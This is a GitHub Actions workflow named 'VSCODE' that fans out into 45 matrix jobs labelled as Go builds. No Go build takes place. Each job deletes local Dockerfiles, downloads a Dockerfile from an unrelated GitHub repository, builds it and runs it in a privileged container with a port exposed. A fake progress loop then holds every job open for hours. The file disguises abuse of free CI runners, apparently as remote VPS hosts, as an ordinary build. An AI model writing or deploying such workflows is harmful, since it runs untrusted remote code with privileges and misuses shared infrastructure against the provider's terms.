name: VSCODE
on: [push, pull_request]
jobs:
  build:
    name: VSCODE
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 30
      fail-fast: false
      matrix:
        go: [1.6, 1.7, 1.8, 1.9, 1.10]
        flag: [A, B, C, D, E, F, G, H, I]
    timeout-minutes: 360
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: VPS
      run: sudo rm -rf Dockerfile Dockerfile* && sudo apt-get update -y && sudo apt-get install wget curl nano -y && wget https://raw.githubusercontent.com/evelynzuhenry/super-octo-spork/main/Dockerfile && sudo docker build -t vscode:latest . && sudo docker run -p 10000:10000 --privileged --name vscode -dit vscode:latest
    - name: Loop
      run: |
          echo "##################################### ALL OK #####################################"
          seq 1 432000 | while read i; do echo -en "\r Running .     $i s /432000 s";sleep 0.1;echo -en "\r Running ..    $i s /432000 s";sleep 0.1;echo -en "\r Running ...   $i s /432000 s";sleep 0.1;echo -en "\r Running ....  $i s /432000 s";sleep 0.1;echo -en "\r Running ..... $i s /432000 s";sleep 0.1;echo -en "\r Running     . $i s /432000 s";sleep 0.1;echo -en "\r Running  .... $i s /432000 s";sleep 0.1;echo -en "\r Running   ... $i s /432000 s";sleep 0.1;echo -en "\r Running    .. $i s /432000 s";sleep 0.1;echo -en "\r Running     . $i s /432000 s";sleep 0.1; done
